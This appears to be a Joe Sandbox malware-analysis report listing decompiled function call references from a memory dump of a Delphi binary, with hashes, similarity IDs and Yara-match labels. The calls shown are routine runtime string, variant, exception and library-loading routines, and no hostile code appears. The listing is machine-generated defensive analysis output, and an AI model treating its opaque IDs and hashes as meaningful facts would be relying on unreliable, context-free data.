                                                                                                    • Part of subcall function 5001B48C: @System@@ValLong$qqrx20System@UnicodeStringri.RTL120 ref: 5001B497
                                                                                                  • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50016987,?,?,?,?,00000000,00000000,00000000,00000000), ref: 5001693A
                                                                                                  • @Sysutils@StrToInt$qqrx20System@UnicodeString.RTL120(00000000,50016987,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016942
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$System@@$FromString$Char$qqrr20StringbSysutils@$AnsiInt$qqrx20InternalStr$qqrr20Stringx20Stringx27System@%T$us$i0$%$Asg$qqrr20Cat$qqrr20CharLen$qqrr20Long$qqrx20Soundex$qqrx20Str$qqriStringiStringpbiStringriStrutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2274701456-0
                                                                                                  • Opcode ID: ac56bb5497c64dd101285ab6a25fa0cdf7d2c5530a325b6ab08d65c0f87a2b94
                                                                                                  • Instruction ID: c54646ffe945ded697551258782202c198b97f85722a43d93f103e696720e317
                                                                                                  • Opcode Fuzzy Hash: ac56bb5497c64dd101285ab6a25fa0cdf7d2c5530a325b6ab08d65c0f87a2b94
                                                                                                  • Instruction Fuzzy Hash: 6621D731E041986BDB05CBE8CC52AAEB7FEDF85200B55C3B6E84093246E6749E449690
                                                                                                  APIs
                                                                                                  • VariantCopy.OLEAUT32(00000000,00000000), ref: 50031445
                                                                                                  • @Variants@VarResultCheck$qqrl.RTL120(00000000,00000000,?,?,00000000,00000000,50031530,?,?,500311AB,500311BB,?), ref: 5003144A
                                                                                                    • Part of subcall function 50031010: VariantClear.OLEAUT32(?), ref: 5003101F
                                                                                                    • Part of subcall function 50031010: @Variants@VarResultCheck$qqrl.RTL120(?,?,?,?,500310B6,50030FEB), ref: 50031024
                                                                                                  • @System@@LStrAsg$qqrpvpxv.RTL120(?,?,00000000,00000000,50031530,?,?,500311AB,500311BB,?), ref: 5003146B
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,00000000,00000000,50031530,?,?,500311AB,500311BB,?), ref: 50031489
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  APIs
                                                                                                  • @Variants@@VarFromInt$qqrr8TVarDataxixzc.RTL120(00000000,5003177B,?,?,?,00000000), ref: 5003162F
                                                                                                  • @Variants@@VarFromInt$qqrr8TVarDataxixzc.RTL120(00000000,5003177B,?,?,?,00000000), ref: 50031642
                                                                                                  • @Variants@@VarFromReal$qqrv.RTL120(00000000,5003177B,?,?,?,00000000), ref: 50031653
                                                                                                  • @Variants@@VarFromReal$qqrv.RTL120(00000000,5003177B,?,?,?,00000000), ref: 50031664
                                                                                                  • @Variants@@VarFromCurr$qqrv.RTL120(00000000,5003177B,?,?,?,00000000), ref: 50031675
                                                                                                  • @Variants@@VarFromReal$qqrv.RTL120(00000000,5003177B,?,?,?,00000000), ref: 50031686
                                                                                                  • @System@@WStrClr$qqrpv.RTL120(50031782,?,?,00000000), ref: 50031775
                                                                                                  APIs
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?), ref: 5002CA02
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?), ref: 5002C9FD
                                                                                                    • Part of subcall function 500267B0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                    • Part of subcall function 500267B0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                    • Part of subcall function 500267B0: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                    • Part of subcall function 500267B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?), ref: 5002CA27
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?), ref: 5002CA2C
                                                                                                  • @Sysutils@TStringBuilder@set_Length$qqri.RTL120 ref: 5002CA38
                                                                                                  • @System@Move$qqrpxvpvi.RTL120 ref: 5002CA59
                                                                                                  • @System@Move$qqrpxvpvi.RTL120 ref: 5002CA71
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A736), ref: 5001A6C0
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5001A736), ref: 5001A6DF
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001A736), ref: 5001A6F5
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5001A736), ref: 5001A700
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001A736), ref: 5001A71B
                                                                                                  APIs
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002D532
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002D52D
                                                                                                    • Part of subcall function 500267B0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                    • Part of subcall function 500267B0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                    • Part of subcall function 500267B0: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                    • Part of subcall function 500267B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002D555
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002D55A
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120(?,?), ref: 5002D562
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002D587
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002D58C
                                                                                                  APIs
                                                                                                  • @Sysutils@SafeLoadLibrary$qqrx20System@UnicodeStringui.RTL120(00000000,5002A618), ref: 5002A57F
                                                                                                    • Part of subcall function 5002B630: SetErrorMode.KERNEL32(00008000), ref: 5002B63A
                                                                                                    • Part of subcall function 5002B630: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5002B684,?,00000000,5002B6A2,?,00008000), ref: 5002B663
                                                                                                    • Part of subcall function 5002B630: LoadLibraryW.KERNEL32(00000000,00000000,5002B684,?,00000000,5002B6A2,?,00008000), ref: 5002B669
                                                                                                  • GetLastError.KERNEL32(00000000,5002A618), ref: 5002A594
                                                                                                  • @Sysutils@SysErrorMessage$qqrui.RTL120(00000000,5002A618), ref: 5002A59C
                                                                                                    • Part of subcall function 50025B28: FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000100,00000000,00000000,5002A945,00000000,5002A99F,?,00000000), ref: 50025B47
                                                                                                    • Part of subcall function 50025B28: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00003200,00000000,00000000,00000000,?,00000100,00000000,00000000,5002A945,00000000,5002A99F,?,00000000), ref: 50025B69
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,5002A618), ref: 5002A5BE
                                                                                                    • Part of subcall function 500267B0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                    • Part of subcall function 500267B0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                    • Part of subcall function 500267B0: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                    • Part of subcall function 500267B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,5002A618), ref: 5002A5C3
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  • @Sysutils@InitializePackage$qqruipqqrui$o.RTL120(00000000,5002A5EA,?,00000000,5002A618), ref: 5002A5DB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  APIs
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(00000000,50010520,?,?,?,00000000,00000000), ref: 500104AC
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,50010520,?,?,?,00000000,00000000), ref: 500104B1
                                                                                                  • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50010520,?,?,?,00000000,00000000), ref: 500104C2
                                                                                                  • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50010520,?,?,?,00000000,00000000), ref: 500104DF
                                                                                                  • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(?,00000000,50010520,?,?,?,00000000,00000000), ref: 500104F5
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50010520,?,?,?,00000000,00000000), ref: 50010500
                                                                                                  APIs
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120 ref: 5002B9FE
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?), ref: 5002BA29
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?), ref: 5002BA24
                                                                                                    • Part of subcall function 500267B0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                    • Part of subcall function 500267B0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                    • Part of subcall function 500267B0: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                    • Part of subcall function 500267B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?), ref: 5002BA4C
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?), ref: 5002BA51
                                                                                                  • @Sysutils@TStringBuilder@set_Length$qqri.RTL120 ref: 5002BA5D
                                                                                                  • @System@Move$qqrpxvpvi.RTL120 ref: 5002BA77
                                                                                                  APIs
                                                                                                  • @System@@WStrToPWChar$qqrx17System@WideString.RTL120(00000000,5001A4D2,?,?,?,00000000,00000000,00000000), ref: 5001A474
                                                                                                  • @System@@WStrFromPWCharLen$qqrr17System@WideStringpbi.RTL120(00000000,5001A4D2,?,?,?,00000000,00000000,00000000), ref: 5001A480
                                                                                                  • CharUpperBuffW.USER32(?,?,00000000,5001A4D2,?,?,?,00000000,00000000,00000000), ref: 5001A490
                                                                                                  • @System@@UStrFromWStr$qqrr20System@UnicodeStringx17System@WideString.RTL120(00000000,5001A4D2,?,?,?,00000000,00000000,00000000), ref: 5001A49C
                                                                                                  • @Sysutils@AnsiUpperCase$qqrx20System@UnicodeString.RTL120(00000000,5001A4D2,?,?,?,00000000,00000000,00000000), ref: 5001A4A7
                                                                                                  • @System@@WStrFromUStr$qqrr17System@WideStringx20System@UnicodeString.RTL120(00000000,5001A4D2,?,?,?,00000000,00000000,00000000), ref: 5001A4B2
                                                                                                  APIs
                                                                                                  • @System@@WStrToPWChar$qqrx17System@WideString.RTL120(00000000,5001A576,?,?,?,00000000,00000000,00000000), ref: 5001A518
                                                                                                  • @System@@WStrFromPWCharLen$qqrr17System@WideStringpbi.RTL120(00000000,5001A576,?,?,?,00000000,00000000,00000000), ref: 5001A524
                                                                                                  • CharLowerBuffW.USER32(?,?,00000000,5001A576,?,?,?,00000000,00000000,00000000), ref: 5001A534
                                                                                                  • @System@@UStrFromWStr$qqrr20System@UnicodeStringx17System@WideString.RTL120(00000000,5001A576,?,?,?,00000000,00000000,00000000), ref: 5001A540
                                                                                                  • @Sysutils@AnsiLowerCase$qqrx20System@UnicodeString.RTL120(00000000,5001A576,?,?,?,00000000,00000000,00000000), ref: 5001A54B
                                                                                                  • @System@@WStrFromUStr$qqrr17System@WideStringx20System@UnicodeString.RTL120(00000000,5001A576,?,?,?,00000000,00000000,00000000), ref: 5001A556
                                                                                                  APIs
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120 ref: 5000A8A6
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A8B2
                                                                                                    • Part of subcall function 5000A0CC: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A0EC
                                                                                                    • Part of subcall function 5000A0CC: @System@@ReallocMem$qqrrpvi.RTL120(?,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A10D
                                                                                                    • Part of subcall function 5000A0CC: @System@@LStrClr$qqrpv.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A128
                                                                                                  • @System@@UniqueStringU$qqrr20System@UnicodeString.RTL120 ref: 5000A8C9
                                                                                                  • @System@@UniqueStringU$qqrr20System@UnicodeString.RTL120 ref: 5000A8EC
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120 ref: 5000A91E
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A92C
                                                                                                  APIs
                                                                                                    • Part of subcall function 5002A3F8: @Sysutils@HashName$qqrpc.RTL120 ref: 5002A412
                                                                                                    • Part of subcall function 5000E884: GetProcAddress.KERNEL32(?,?), ref: 5000E8A8
                                                                                                    • Part of subcall function 5000E884: @System@@LStrClr$qqrpv.RTL120(5000E8EE,?,?,00000000), ref: 5000E8E1
                                                                                                  • @Sysutils@GetModuleName$qqrui.RTL120(?,Initialize,00000000,5002A4DD), ref: 5002A48C
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,?,?,Initialize,00000000,5002A4DD), ref: 5002A4A9
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,?,?,Initialize,00000000,5002A4DD), ref: 5002A4B8
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,Initialize,00000000,5002A4DD), ref: 5002A4BD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Sysutils@$System@@$AddressClr$qqrpvExcept$qqrvException@$bctr$qqrx20HashLoadModuleName$qqrpcName$qqruiProcRaiseRecxiStringString$qqrp20Stringpx14Unicode
                                                                                                  • String ID: Initialize
                                                                                                  • API String ID: 1682061199-2538663250
                                                                                                  APIs
                                                                                                  • VariantClear.OLEAUT32(?), ref: 5003101F
                                                                                                  • @Variants@VarResultCheck$qqrl.RTL120(?,?,?,?,500310B6,50030FEB), ref: 50031024
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(?,?,?,500310B6,50030FEB), ref: 5003103A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Check$qqrlClearClr$qqrpvResultSystem@@VariantVariants@
                                                                                                  • String ID:
                                                                                                  • API String ID: 452420788-0
                                                                                                  APIs
                                                                                                  • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002C13F
                                                                                                  • @System@@WStrFromUStr$qqrr17System@WideStringx20System@UnicodeString.RTL120(?,?,00000000,5002C1B3,?,?,?,?,00000000,00000000,00000000), ref: 5002C165
                                                                                                  • @Strutils@MidStr$qqrx17System@WideStringxixi.RTL120(?,?,00000000,5002C1B3,?,?,?,?,00000000,00000000,00000000), ref: 5002C174
                                                                                                  • @System@@UStrFromWStr$qqrr20System@UnicodeStringx17System@WideString.RTL120(?,00000000,5002C1B3,?,?,?,?,00000000,00000000,00000000), ref: 5002C17F
                                                                                                  • @Sysutils@TStringBuilder@$bctr$qqrx20System@UnicodeStringi.RTL120(?,00000000,5002C1B3,?,?,?,?,00000000,00000000,00000000), ref: 5002C18B
                                                                                                  • @System@@WStrArrayClr$qqrpvi.RTL120(5002C1BA,?,?,?,00000000,00000000,00000000), ref: 5002C1A5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$StringUnicodeWide$From$ArrayBuilder@$bctr$qqrx20ClassClassoClr$qqrpviCreate$qqrp17MetaStr$qqrr17Str$qqrr20Str$qqrx17StringiStringx17Stringx20StringxixiStrutils@Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 3564302108-0
                                                                                                  APIs
                                                                                                  • @Sysutils@StrNew$qqrpxc.RTL120 ref: 50028947
                                                                                                  • @Sysutils@StrLower$qqrpc.RTL120 ref: 5002894C
                                                                                                  • @Sysutils@StrNew$qqrpxc.RTL120(00000000,500289AE), ref: 50028964
                                                                                                    • Part of subcall function 5001DFD8: @Sysutils@StrLen$qqrpxc.RTL120(?,?,5002894C), ref: 5001DFE7
                                                                                                    • Part of subcall function 5001DFD8: @Sysutils@AnsiStrAlloc$qqrui.RTL120(?,?,5002894C), ref: 5001DFF1
                                                                                                    • Part of subcall function 5001DFD8: @Sysutils@StrMove$qqrpcpxcui.RTL120(?,?,5002894C), ref: 5001DFFA
                                                                                                  • @Sysutils@StrLower$qqrpc.RTL120(00000000,500289AE), ref: 50028969
                                                                                                  • @Sysutils@StrPos$qqrpxct1.RTL120(00000000,500289AE), ref: 50028977
                                                                                                  • @Sysutils@StrDispose$qqrpc.RTL120(500289B5), ref: 500289A0
                                                                                                  • @Sysutils@StrDispose$qqrpc.RTL120(500289B5), ref: 500289A8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Sysutils@$Dispose$qqrpcLower$qqrpcNew$qqrpxc$Alloc$qqruiAnsiLen$qqrpxcMove$qqrpcpxcuiPos$qqrpxct1
                                                                                                  • String ID:
                                                                                                  • API String ID: 3159898584-0
                                                                                                  APIs
                                                                                                  • @Sysutils@StrNew$qqrpxb.RTL120 ref: 500289D3
                                                                                                  • @Sysutils@StrLower$qqrpb.RTL120 ref: 500289D8
                                                                                                    • Part of subcall function 5001DF24: @Sysutils@StrLen$qqrpxb.RTL120(?,?,500289DD), ref: 5001DF2C
                                                                                                  • @Sysutils@StrNew$qqrpxb.RTL120(00000000,50028A3A), ref: 500289F0
                                                                                                    • Part of subcall function 5001E004: @Sysutils@StrLen$qqrpxb.RTL120(?,?,500289D8), ref: 5001E013
                                                                                                    • Part of subcall function 5001E004: @Sysutils@WideStrAlloc$qqrui.RTL120(?,?,500289D8), ref: 5001E01D
                                                                                                    • Part of subcall function 5001E004: @Sysutils@StrMove$qqrpbpxbui.RTL120(?,?,500289D8), ref: 5001E026
                                                                                                  • @Sysutils@StrLower$qqrpb.RTL120(00000000,50028A3A), ref: 500289F5
                                                                                                  • @Sysutils@StrPos$qqrpxbt1.RTL120(00000000,50028A3A), ref: 50028A03
                                                                                                  • @Sysutils@StrDispose$qqrpb.RTL120(50028A41), ref: 50028A2C
                                                                                                  • @Sysutils@StrDispose$qqrpb.RTL120(50028A41), ref: 50028A34
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Sysutils@$Dispose$qqrpbLen$qqrpxbLower$qqrpbNew$qqrpxb$Alloc$qqruiMove$qqrpbpxbuiPos$qqrpxbt1Wide
                                                                                                  • String ID:
                                                                                                  • API String ID: 2681763821-0
                                                                                                  APIs
                                                                                                  • @System@@LStrClr$qqrpv.RTL120 ref: 5000565F
                                                                                                    • Part of subcall function 500087A8: @System@@FreeMem$qqrpv.RTL120(?,50004445,5000444D), ref: 500087C4
                                                                                                  • @System@@ReadString$qqrr15System@TTextRecp28System@%SmallString$iuc$255%i.RTL120 ref: 50005673
                                                                                                  • @System@@LStrFromString$qqrr27System@%AnsiStringT$us$i0$%rx28System@%SmallString$iuc$255%us.RTL120 ref: 5000567E
                                                                                                  • @System@@ReadString$qqrr15System@TTextRecp28System@%SmallString$iuc$255%i.RTL120 ref: 50005692
                                                                                                  • @System@@LStrFromString$qqrr27System@%AnsiStringT$us$i0$%rx28System@%SmallString$iuc$255%us.RTL120(00000000), ref: 5000569F
                                                                                                  • @System@@LStrCat$qqrv.RTL120(00000000), ref: 500056A9
                                                                                                    • Part of subcall function 50008C34: @System@@LStrSetLength$qqrv.RTL120(?,?,?,500056AE,00000000), ref: 50008C5B
                                                                                                    • Part of subcall function 50008C34: @System@@LStrAsg$qqrpvpxv.RTL120(00000000,?,?,?,500056AE,00000000), ref: 50008C72
                                                                                                    • Part of subcall function 50008C34: @System@Move$qqrpxvpvi.RTL120(00000000,?,?,?,500056AE,00000000), ref: 50008C81
                                                                                                    • Part of subcall function 50008C34: @System@@LStrClr$qqrpv.RTL120(00000000,?,?,?,500056AE,00000000), ref: 50008C8E
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(00000000), ref: 500056B0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$System@%$Small$Clr$qqrpvSystem@$AnsiFromReadRecp28StringString$iuc$255%iString$iuc$255%usString$qqrr15String$qqrr27T$us$i0$%rx28Text$Asg$qqrpvpxvCat$qqrvFreeLength$qqrvMem$qqrpvMove$qqrpxvpvi
                                                                                                  • String ID:
                                                                                                  • API String ID: 662791780-0
                                                                                                  APIs
                                                                                                  • GetCurrentDirectoryA.KERNEL32(00000105,?), ref: 50004321
                                                                                                  • SetCurrentDirectoryA.KERNEL32(?,00000105,?), ref: 50004327
                                                                                                  • GetCurrentDirectoryA.KERNEL32(00000105,?), ref: 50004336
                                                                                                  • SetCurrentDirectoryA.KERNEL32(?,00000105,?), ref: 50004347
                                                                                                  • @System@@LStrFromArray$qqrr27System@%AnsiStringT$us$i0$%pcius.RTL120(00000000,00000105,?), ref: 50004359
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
